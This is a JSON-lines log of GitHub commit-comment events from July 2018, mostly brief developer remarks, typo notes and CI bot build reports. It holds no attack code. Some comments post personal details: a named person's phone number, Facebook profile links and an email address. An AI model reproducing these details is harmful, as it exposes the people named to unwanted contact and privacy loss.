{"id":"8006306940","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29805712,"position":null,"line":null,"path":null,"commit_id":"e87205ad97f30536f096e9858d33e8ad5d5ce220","created_at":"2018-07-23T20:41:42Z","updated_at":"2018-07-23T20:41:42Z","author_association":"OWNER","body":"I once tested the full rank_3 for the bishop, and it was ELO 1.6 yellow (with SPRT[0, 5])\r\nhttp://tests.stockfishchess.org/tests/view/5aa28e320ebc590297cb643a\r\n\r\nAdding the full rank_3 for knight and bishop was not so good\r\nhttp://tests.stockfishchess.org/tests/view/5aa2e5970ebc590297cb647b\r\n\r\nThe psqt tables should be able to tell apart which of those square is better. \r\nI might try to tweak the rank_3 in the minor psqt "}},"created_at":"2018-07-23T20:41:42Z"}
{"id":"8006318318","type":"CommitCommentEvent","actor":{"login":"austin48"},"repo":{"name":"austin48/mneme-project"},"payload":{"comment":{"id":29805736,"position":null,"line":null,"path":null,"commit_id":"21072f96f67b328172207aa4582b23e7acdff1ce","created_at":"2018-07-23T20:43:54Z","updated_at":"2018-07-23T20:43:54Z","author_association":"OWNER","body":"I'm not sure if this is the best fix, but it seems to work.  "}},"created_at":"2018-07-23T20:43:54Z"}
{"id":"8006322905","type":"CommitCommentEvent","actor":{"login":"ggam"},"repo":{"name":"payara/Payara"},"payload":{"comment":{"id":29805748,"position":12,"line":126,"path":"appserver/batch/glassfish-batch-commands/src/main/java/org/glassfish/batch/ListBatchJobs.java","commit_id":"5fe53daf2669f8262b6d4424238d56e6e270eadf","created_at":"2018-07-23T20:44:52Z","updated_at":"2018-07-23T20:44:52Z","author_association":"NONE","body":"Typo: greater"}},"created_at":"2018-07-23T20:44:52Z"}
{"id":"8006326906","type":"CommitCommentEvent","actor":{"login":"VictorGijsbers"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29805760,"position":null,"line":null,"path":null,"commit_id":"d15ccc0101006539a11c0f2f422f9d3dfcff5cce","created_at":"2018-07-23T20:45:36Z","updated_at":"2018-07-23T20:45:36Z","author_association":"MEMBER","body":"If you want to, you can do it. ;-) I fixed the other test, so there's that. And this particular fix will require the use of a regular expression, right? Sounds like our cup of tea. ;-)"}},"created_at":"2018-07-23T20:45:36Z"}
{"id":"8006327219","type":"CommitCommentEvent","actor":{"login":"Heizmann"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29805761,"position":null,"line":null,"path":null,"commit_id":"b72404b57496231d74d279fa313af84fb58e2368","created_at":"2018-07-23T20:45:40Z","updated_at":"2018-07-23T20:45:40Z","author_association":"MEMBER","body":"Thanks"}},"created_at":"2018-07-23T20:45:40Z"}
{"id":"8006327655","type":"CommitCommentEvent","actor":{"login":"VictorGijsbers"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29805765,"position":null,"line":null,"path":null,"commit_id":"d15ccc0101006539a11c0f2f422f9d3dfcff5cce","created_at":"2018-07-23T20:45:46Z","updated_at":"2018-07-23T20:45:46Z","author_association":"MEMBER","body":"our -> your"}},"created_at":"2018-07-23T20:45:46Z"}
{"id":"8006331583","type":"CommitCommentEvent","actor":{"login":"sirbrillig"},"repo":{"name":"Automattic/phpcs-neutron-standard"},"payload":{"comment":{"id":29805772,"position":11,"line":23,"path":"composer.json","commit_id":"40642df5ec9ea39871f1b99ada7fa34976169788","created_at":"2018-07-23T20:46:30Z","updated_at":"2018-07-23T20:46:30Z","author_association":"MEMBER","body":"Thanks! "}},"created_at":"2018-07-23T20:46:30Z"}
{"id":"8006331705","type":"CommitCommentEvent","actor":{"login":"ojaswa1942"},"repo":{"name":"ojaswa1942/Snake-Game"},"payload":{"comment":{"id":29805773,"position":null,"line":null,"path":null,"commit_id":"b2792f81d6a789061aec4b93d687ec3314e51485","created_at":"2018-07-23T20:46:31Z","updated_at":"2018-07-23T20:46:31Z","author_association":"OWNER","body":"And ofc add it to front end"}},"created_at":"2018-07-23T20:46:31Z"}
{"id":"8006332154","type":"CommitCommentEvent","actor":{"login":"mciul"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29805776,"position":null,"line":null,"path":null,"commit_id":"d15ccc0101006539a11c0f2f422f9d3dfcff5cce","created_at":"2018-07-23T20:46:37Z","updated_at":"2018-07-23T20:46:37Z","author_association":"CONTRIBUTOR","body":"Ok, I'll handle it. :)"}},"created_at":"2018-07-23T20:46:37Z"}
{"id":"8006334902","type":"CommitCommentEvent","actor":{"login":"Heizmann"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29805779,"position":null,"line":null,"path":null,"commit_id":"4218840095879f411bd65114fc16e637a74f2235","created_at":"2018-07-23T20:47:09Z","updated_at":"2018-07-23T20:47:09Z","author_association":"MEMBER","body":"Thanks."}},"created_at":"2018-07-23T20:47:09Z"}
{"id":"8006350239","type":"CommitCommentEvent","actor":{"login":"Ths2-9Y-LqJt6"},"repo":{"name":"melalj/topojson-map-generator"},"payload":{"comment":{"id":29805800,"position":65,"line":119,"path":"generate.sh","commit_id":"334c8732570db6dc146d1d014f11a68d4b6214a4","created_at":"2018-07-23T20:50:08Z","updated_at":"2018-07-23T20:50:08Z","author_association":"NONE","body":"Oop, same is true for ``ISO_A2`` and ``ISO_A3`` - both should be lowercase"}},"created_at":"2018-07-23T20:50:08Z"}
{"id":"8006354123","type":"CommitCommentEvent","actor":{"login":"friuns2"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29805808,"position":null,"line":null,"path":null,"commit_id":"eb5966737a32dca8f36d2c064802bb710e492fd8","created_at":"2018-07-23T20:50:54Z","updated_at":"2018-07-23T20:50:54Z","author_association":"NONE","body":"should it detect cheat engine, how it should work?\r\ni did put breakpoint on OutputDebugStringDbgOnly(L\"Moving on to delta check...\");\r\nthen i attached VEH Debugger with Page Exception, it didnt detect it"}},"created_at":"2018-07-23T20:50:54Z"}
{"id":"8006354924","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"nichtdasleo/LeOS9000-Bot"},"payload":{"comment":{"id":29805809,"position":null,"line":null,"path":null,"commit_id":"9965f805c14462b25f19989e6a177d8e4e593a0b","created_at":"2018-07-23T20:51:05Z","updated_at":"2018-07-23T20:51:05Z","author_association":"OWNER","body":"ja"}},"created_at":"2018-07-23T20:51:05Z"}
{"id":"8006358690","type":"CommitCommentEvent","actor":{"login":"Setti7"},"repo":{"name":"Setti7/SVFB-GUI"},"payload":{"comment":{"id":29805816,"position":null,"line":null,"path":null,"commit_id":"0a616760a42e1a4e4f3409e611a18cd087d669fc","created_at":"2018-07-23T20:51:50Z","updated_at":"2018-07-23T20:51:50Z","author_association":"OWNER","body":"Esse TODO ai é veio, esqueci de apagar"}},"created_at":"2018-07-23T20:51:50Z"}
{"id":"8006364765","type":"CommitCommentEvent","actor":{"login":"nairdo"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29805827,"position":null,"line":null,"path":null,"commit_id":"6f1a3a8df6346e415980628b1bc595e4b97efdd4","created_at":"2018-07-23T20:53:03Z","updated_at":"2018-07-23T20:53:03Z","author_association":"MEMBER","body":"@shivambareria please re-test your fix.  It should not set the RecordStatusLastModifiedDateTime unless the value is changing."}},"created_at":"2018-07-23T20:53:03Z"}
{"id":"8006366400","type":"CommitCommentEvent","actor":{"login":"braver"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29805830,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T20:53:22Z","updated_at":"2018-07-23T20:53:22Z","author_association":"MEMBER","body":"Ok, so, there we go :) "}},"created_at":"2018-07-23T20:53:22Z"}
{"id":"8006369027","type":"CommitCommentEvent","actor":{"login":"aplcido"},"repo":{"name":"aplcido/Machine-Learning"},"payload":{"comment":{"id":29805831,"position":null,"line":null,"path":null,"commit_id":"d07c5fbceab1ef4712a38648f26b4ad7d634520f","created_at":"2018-07-23T20:53:47Z","updated_at":"2018-07-23T20:53:47Z","author_association":"OWNER","body":"*in the dataframe\r\nI'm picky :)"}},"created_at":"2018-07-23T20:53:47Z"}
{"id":"8006375035","type":"CommitCommentEvent","actor":{"login":"dsmontoya"},"repo":{"name":"entropyx/google-api-go-client"},"payload":{"comment":{"id":29805839,"position":25,"line":8012,"path":"content/v2/content-gen.go","commit_id":"7bd0eb2972241da8ac037a7bd5f8ed8b54f6ad42","created_at":"2018-07-23T20:54:47Z","updated_at":"2018-07-23T20:54:47Z","author_association":"NONE","body":"Fix this typo!"}},"created_at":"2018-07-23T20:54:47Z"}
{"id":"8006380382","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29805849,"position":null,"line":null,"path":null,"commit_id":"db63775e5d8cdcd2c0bbb0a9e0344262a0d680cd","created_at":"2018-07-23T20:55:51Z","updated_at":"2018-07-23T20:55:51Z","author_association":"CONTRIBUTOR","body":"agreed, and it would probably be better for performance"}},"created_at":"2018-07-23T20:55:51Z"}
{"id":"8006380897","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29805852,"position":null,"line":null,"path":null,"commit_id":"1000717da820d87b330719034281a69eaf37bb89","created_at":"2018-07-23T20:55:57Z","updated_at":"2018-07-23T20:55:57Z","author_association":"NONE","body":"Note that I'm running CMake with `-DBUILD_SHARED_LIBS=True` option"}},"created_at":"2018-07-23T20:55:57Z"}
{"id":"8006392306","type":"CommitCommentEvent","actor":{"login":"jwill2385"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29805871,"position":null,"line":null,"path":null,"commit_id":"dd679e3052fd97cdecde59741e92993c6abcac07","created_at":"2018-07-23T20:58:14Z","updated_at":"2018-07-23T20:58:14Z","author_association":"NONE","body":"Removed getPlaces() call from the mainActivity because we update the individual arrays in each fragment. \r\n![screen shot 2018-07-23 at 1 56 22 pm](https://user-images.githubusercontent.com/40250274/43102600-70285f96-8e80-11e8-8e2a-bb92e1343320.png)\r\n"}},"created_at":"2018-07-23T20:58:14Z"}
{"id":"8006403942","type":"CommitCommentEvent","actor":{"login":"jrenzi"},"repo":{"name":"davidyaha/hookpress"},"payload":{"comment":{"id":29805901,"position":null,"line":null,"path":null,"commit_id":"6d51bb45ec71daba4682bd9291d60e90fc360f1c","created_at":"2018-07-23T21:00:34Z","updated_at":"2018-07-23T21:00:34Z","author_association":"NONE","body":"This worked great! Do you have a version that works with the current version of PHP? I've replaced includes.php and works, but somehow to edit the hook I have to deleted and add it again, since when clicking on edit I get a blank popover"}},"created_at":"2018-07-23T21:00:34Z"}
{"id":"8006406782","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29805906,"position":null,"line":null,"path":null,"commit_id":"06de2c066046b21c12439cefb8f6375eb8955f38","created_at":"2018-07-23T21:01:08Z","updated_at":"2018-07-23T21:01:08Z","author_association":"CONTRIBUTOR","body":"Fix #3004"}},"created_at":"2018-07-23T21:01:08Z"}
{"id":"8006409103","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29805912,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-23T21:01:35Z","updated_at":"2018-07-23T21:01:35Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - x86_64-MacOS-10.9-clang: OK (2944 of 2944 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-23T21:01:35Z"}
{"id":"8006410697","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29805915,"position":null,"line":null,"path":null,"commit_id":"3ca372d0a778c68318f0cecf53a5dd4fedb6113c","created_at":"2018-07-23T21:01:55Z","updated_at":"2018-07-23T21:01:55Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 234](http://build.palaso.org/viewLog.html?buildId=125464&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **FAILURE**\nSummary: Compilation error: src\\SIL.LCModel.Core\\SIL.LCModel.Core.csproj (new) Build time: 00:00:39"}},"created_at":"2018-07-23T21:01:55Z"}
{"id":"8006418964","type":"CommitCommentEvent","actor":{"login":"jdschwam"},"repo":{"name":"jdschwam/aahsld8"},"payload":{"comment":{"id":29805922,"position":null,"line":null,"path":null,"commit_id":"2ccab141cbaf9d1f69f35508a21608296c0e11a2","created_at":"2018-07-23T21:03:38Z","updated_at":"2018-07-23T21:03:38Z","author_association":"OWNER","body":"Created multidev environment [aahsld8#ci-2](https://dashboard.pantheon.io/sites/b4f7d868-f007-4ee7-8f2a-b4677ab897b2#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-aahsld8.pantheonsite.io/)"}},"created_at":"2018-07-23T21:03:38Z"}
{"id":"8006420058","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29805927,"position":9,"line":9,"path":"kodilla-spring/src/main/java/com/kodilla/spring/forum/ForumUser.java","commit_id":"3eb64a7089240608a73f98490f12fcdbb6b0dbe0","created_at":"2018-07-23T21:03:51Z","updated_at":"2018-07-23T21:03:51Z","author_association":"NONE","body":"Zmienna powinna być prywatna"}},"created_at":"2018-07-23T21:03:51Z"}
{"id":"8006424292","type":"CommitCommentEvent","actor":{"login":"viktor23061"},"repo":{"name":"nbedos/termtosvg"},"payload":{"comment":{"id":29805934,"position":13,"line":177,"path":"termtosvg/anim.py","commit_id":"4992d0f39d82d87e5082ae85b1475b9df85d75b1","created_at":"2018-07-23T21:04:43Z","updated_at":"2018-07-23T21:04:43Z","author_association":"NONE","body":"..."}},"created_at":"2018-07-23T21:04:43Z"}
{"id":"8006434865","type":"CommitCommentEvent","actor":{"login":"marianaviana"},"repo":{"name":"marianaviana/marianaviana.github.io"},"payload":{"comment":{"id":29805963,"position":null,"line":null,"path":null,"commit_id":"1d429f4a454faee0fcc20ba1d54776653a764af4","created_at":"2018-07-23T21:06:56Z","updated_at":"2018-07-23T21:06:56Z","author_association":"OWNER","body":"Att cliente táxi lagos"}},"created_at":"2018-07-23T21:06:56Z"}
{"id":"8006437401","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29805965,"position":null,"line":null,"path":null,"commit_id":"5e4afd66b4ae580ec21d7ccf00f3ad89c1fef593","created_at":"2018-07-23T21:07:27Z","updated_at":"2018-07-23T21:07:27Z","author_association":"COLLABORATOR","body":"- `OverlayEvent` removed: `SET_GAME_INFO`"}},"created_at":"2018-07-23T21:07:27Z"}
{"id":"8006441601","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29805973,"position":null,"line":null,"path":null,"commit_id":"c1f62ec9cac50347951fb7ee9b931fc99867587d","created_at":"2018-07-23T21:08:22Z","updated_at":"2018-07-23T21:08:22Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-266](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-266).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-266-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T21:08:22Z"}
{"id":"8006444157","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"Igalia/webkit"},"payload":{"comment":{"id":29805978,"position":15,"line":2728,"path":"Source/JavaScriptCore/llint/LowLevelInterpreter64.asm","commit_id":"3f94d2f1395f97cf914febbf21d7d81068bd6826","created_at":"2018-07-23T21:08:56Z","updated_at":"2018-07-23T21:08:56Z","author_association":"MEMBER","body":"so, is this not enough to transition from oldStructure -> newStructure? :("}},"created_at":"2018-07-23T21:08:56Z"}
{"id":"8006446164","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29805982,"position":null,"line":null,"path":null,"commit_id":"3ca372d0a778c68318f0cecf53a5dd4fedb6113c","created_at":"2018-07-23T21:09:22Z","updated_at":"2018-07-23T21:09:22Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 200](http://build.palaso.org/viewLog.html?buildId=125465&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:20"}},"created_at":"2018-07-23T21:09:22Z"}
{"id":"8006449444","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29805990,"position":null,"line":null,"path":null,"commit_id":"62aad5b84fc9ab8be0f77f954a676d6b27e96e3c","created_at":"2018-07-23T21:10:03Z","updated_at":"2018-07-23T21:10:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loont](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loont).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loont-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T21:10:03Z"}
{"id":"8006450000","type":"CommitCommentEvent","actor":{"login":"krono"},"repo":{"name":"davidswelt/aquamacs-emacs"},"payload":{"comment":{"id":29805991,"position":null,"line":null,"path":null,"commit_id":"fe76b32afb21c8ff75d4ae88d18b3d1e9092c5bc","created_at":"2018-07-23T21:10:11Z","updated_at":"2018-07-23T21:10:11Z","author_association":"NONE","body":"Thanks :D"}},"created_at":"2018-07-23T21:10:11Z"}
{"id":"8006452824","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29805998,"position":null,"line":null,"path":null,"commit_id":"3ca372d0a778c68318f0cecf53a5dd4fedb6113c","created_at":"2018-07-23T21:10:46Z","updated_at":"2018-07-23T21:10:46Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 198](http://build.palaso.org/viewLog.html?buildId=125466&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:01:58"}},"created_at":"2018-07-23T21:10:46Z"}
{"id":"8006459538","type":"CommitCommentEvent","actor":{"login":"kml27"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806006,"position":17,"line":23,"path":"makeself/install-esaude/install-eSaude.sh","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:12:14Z","updated_at":"2018-07-23T21:12:14Z","author_association":"COLLABORATOR","body":"Good to see this change while you were at it..."}},"created_at":"2018-07-23T21:12:14Z"}
{"id":"8006460947","type":"CommitCommentEvent","actor":{"login":"ayeungturtle"},"repo":{"name":"ayeungturtle/pong2.0"},"payload":{"comment":{"id":29806007,"position":null,"line":null,"path":null,"commit_id":"a21ab0363107de9e36e94eceb6993fff50b37fbf","created_at":"2018-07-23T21:12:31Z","updated_at":"2018-07-23T21:12:31Z","author_association":"OWNER","body":"yo"}},"created_at":"2018-07-23T21:12:31Z"}
{"id":"8006462398","type":"CommitCommentEvent","actor":{"login":"kml27"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806012,"position":40,"line":220,"path":"makeself/install-esaude/install-eSaude.sh","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:12:50Z","updated_at":"2018-07-23T21:12:50Z","author_association":"COLLABORATOR","body":"I missed these before... this needed to be fixed. Good catch."}},"created_at":"2018-07-23T21:12:50Z"}
{"id":"8006463753","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"Igalia/webkit"},"payload":{"comment":{"id":29806015,"position":25,"line":1230,"path":"Source/JavaScriptCore/runtime/CommonSlowPaths.cpp","commit_id":"3f94d2f1395f97cf914febbf21d7d81068bd6826","created_at":"2018-07-23T21:13:08Z","updated_at":"2018-07-23T21:13:08Z","author_association":"MEMBER","body":"Crashes here the first time the slow-path is taken after the first set of caches are set up (https://gist.github.com/caitp/c347a997798602f465f28567d791bb01#file-llint-fast-crash-js), the first comment in the gist details where/how that happens.\r\n\r\nSo it seems like the transition chain is not being held onto properly. What can I do to ensure it sticks around?"}},"created_at":"2018-07-23T21:13:08Z"}
{"id":"8006465577","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29806016,"position":null,"line":null,"path":null,"commit_id":"7dae88f95101ab42035ac5c1453b20e4e168354c","created_at":"2018-07-23T21:13:30Z","updated_at":"2018-07-23T21:13:30Z","author_association":"CONTRIBUTOR","body":"This works on your end if you delete cookies and reload the site?"}},"created_at":"2018-07-23T21:13:30Z"}
{"id":"8006466259","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29806018,"position":null,"line":null,"path":null,"commit_id":"3418941802fd37491930858e2b2768eeb20a54f5","created_at":"2018-07-23T21:13:39Z","updated_at":"2018-07-23T21:13:39Z","author_association":"COLLABORATOR","body":"Well done; great work."}},"created_at":"2018-07-23T21:13:39Z"}
{"id":"8006469639","type":"CommitCommentEvent","actor":{"login":"ivmartel"},"repo":{"name":"ivmartel/dwv"},"payload":{"comment":{"id":29806028,"position":null,"line":null,"path":null,"commit_id":"fbe67cae133afbfffb2741c2a7c3be68c23e3882","created_at":"2018-07-23T21:14:23Z","updated_at":"2018-07-23T21:14:23Z","author_association":"OWNER","body":"This code has been re-factored since this commit, it is now in [rawImageLoader.js](https://github.com/ivmartel/dwv/blob/v0.23.6/src/io/rawImageLoader.js). It does not use the `responseURL` property so it looks good to me."}},"created_at":"2018-07-23T21:14:23Z"}
{"id":"8006473762","type":"CommitCommentEvent","actor":{"login":"MauriceRowe"},"repo":{"name":"MauriceRowe/Sim-Racing-Pedals-with-Load-Cell"},"payload":{"comment":{"id":29806045,"position":null,"line":null,"path":null,"commit_id":"9eed543fd71d2d1ddc1a00e5100cede8706c4684","created_at":"2018-07-23T21:15:17Z","updated_at":"2018-07-23T21:15:17Z","author_association":"OWNER","body":"Wiring diagram as a jpeg image"}},"created_at":"2018-07-23T21:15:17Z"}
{"id":"8006474033","type":"CommitCommentEvent","actor":{"login":"juandaniel2013"},"repo":{"name":"juandaniel2013/Curso-DBMS"},"payload":{"comment":{"id":29806048,"position":2,"line":1,"path":"README.md","commit_id":"d629d084e5c96812efbd4e10519b7e49ae301afc","created_at":"2018-07-23T21:15:21Z","updated_at":"2018-07-23T21:15:21Z","author_association":"OWNER","body":"Nombre : Juan Daniel Sanchez Montaño\r\nCelular: 77935569"}},"created_at":"2018-07-23T21:15:21Z"}
{"id":"8006477524","type":"CommitCommentEvent","actor":{"login":"andersy005"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29806053,"position":3,"line":2,"path":"condarecipe9.2/build.sh","commit_id":"69bcf6d1130aef4c86f3977452d5c9da4f22a065","created_at":"2018-07-23T21:16:07Z","updated_at":"2018-07-23T21:16:07Z","author_association":"COLLABORATOR","body":"As of now, the `build.py` exists in `src` dir. This `dir` is used as the source while building the package. \r\nI am going to move it to `RECIPE_DIR`. Also, I am going to move all the work being done inside `build.py`  to `cudatoolk-dev-post-install.sh`. This way, we won't need `build.sh` at all. "}},"created_at":"2018-07-23T21:16:07Z"}
{"id":"8006484558","type":"CommitCommentEvent","actor":{"login":"andersy005"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29806063,"position":2,"line":1,"path":"condarecipe9.2/bld.bat","commit_id":"5eb39fed28d62fa217c1ecc5827614916665b7cc","created_at":"2018-07-23T21:17:39Z","updated_at":"2018-07-23T21:17:39Z","author_association":"COLLABORATOR","body":"Do you mean `bld.bat`?"}},"created_at":"2018-07-23T21:17:39Z"}
{"id":"8006486086","type":"CommitCommentEvent","actor":{"login":"gwathlobal"},"repo":{"name":"gwathlobal/CotD"},"payload":{"comment":{"id":29806066,"position":null,"line":null,"path":null,"commit_id":"9ecf649af5dd9632eae4d45c726ace0d1aeb494e","created_at":"2018-07-23T21:17:59Z","updated_at":"2018-07-23T21:17:59Z","author_association":"OWNER","body":"@devapromix \r\nПо адресу rlgclub.ru выдает вот такое \"Срок регистрации домена rlgclub.ru истек!\"\r\nКажется накрылся наш уютненький сайтик ("}},"created_at":"2018-07-23T21:17:59Z"}
{"id":"8006491942","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29806081,"position":null,"line":null,"path":null,"commit_id":"c1f62ec9cac50347951fb7ee9b931fc99867587d","created_at":"2018-07-23T21:19:16Z","updated_at":"2018-07-23T21:19:16Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-266](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-266).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-266-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T21:19:16Z"}
{"id":"8006492874","type":"CommitCommentEvent","actor":{"login":"MauriceRowe"},"repo":{"name":"MauriceRowe/Sim-Racing-Pedals-with-Load-Cell"},"payload":{"comment":{"id":29806083,"position":null,"line":null,"path":null,"commit_id":"0531a73e0393fccee202b4ad81f39ac8cd8c8da5","created_at":"2018-07-23T21:19:28Z","updated_at":"2018-07-23T21:19:28Z","author_association":"OWNER","body":"Schematic.jpg - Wiring diagram as a jpeg image.\r\nSimPedals_circuit_board.rrb - Circuit Board, can be opened with free software from ExpressPCB.com.\r\nSim_Pedals_Board.jpg - Circuit Board layout as a jpeg image.\r\nSim_Pedals_Load_Cell.ino - Arduino code file.\r\nLicense.txt - Open source license for this project."}},"created_at":"2018-07-23T21:19:28Z"}
{"id":"8006495932","type":"CommitCommentEvent","actor":{"login":"Michiote86"},"repo":{"name":"Michiote86/vertigo"},"payload":{"comment":{"id":29806091,"position":null,"line":null,"path":null,"commit_id":"b6d3b562d86e52be3c0bcd587e21df1fdbd80580","created_at":"2018-07-23T21:20:09Z","updated_at":"2018-07-23T21:20:09Z","author_association":"OWNER","body":"https://www.facebook.com/jesus.alvarezcano.5"}},"created_at":"2018-07-23T21:20:09Z"}
{"id":"8006496616","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"arxiv-vanity/engrafo"},"payload":{"comment":{"id":29806093,"position":null,"line":null,"path":null,"commit_id":"07ef21f23f3339f4a513decac42ebf8d816db926","created_at":"2018-07-23T21:20:17Z","updated_at":"2018-07-23T21:20:17Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #216 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-23T21:20:17Z"}
{"id":"8006498231","type":"CommitCommentEvent","actor":{"login":"Michiote86"},"repo":{"name":"Michiote86/vertigo"},"payload":{"comment":{"id":29806097,"position":null,"line":null,"path":null,"commit_id":"b6d3b562d86e52be3c0bcd587e21df1fdbd80580","created_at":"2018-07-23T21:20:36Z","updated_at":"2018-07-23T21:20:36Z","author_association":"OWNER","body":"https://www.facebook.com/profile.php?id=100000969016193"}},"created_at":"2018-07-23T21:20:36Z"}
{"id":"8006498830","type":"CommitCommentEvent","actor":{"login":"sscalpone"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29806105,"position":null,"line":null,"path":null,"commit_id":"1000717da820d87b330719034281a69eaf37bb89","created_at":"2018-07-23T21:20:44Z","updated_at":"2018-07-23T21:20:44Z","author_association":"CONTRIBUTOR","body":"Fortran::parser::QuoteCharacterLiteral is referenced from libFortranEvaluate.so; it is defined in libFortranParser.so."}},"created_at":"2018-07-23T21:20:44Z"}
{"id":"8006499623","type":"CommitCommentEvent","actor":{"login":"Michiote86"},"repo":{"name":"Michiote86/vertigo"},"payload":{"comment":{"id":29806106,"position":null,"line":null,"path":null,"commit_id":"b6d3b562d86e52be3c0bcd587e21df1fdbd80580","created_at":"2018-07-23T21:20:55Z","updated_at":"2018-07-23T21:20:55Z","author_association":"OWNER","body":"nancysoto@hotmail.com\r\n"}},"created_at":"2018-07-23T21:20:55Z"}
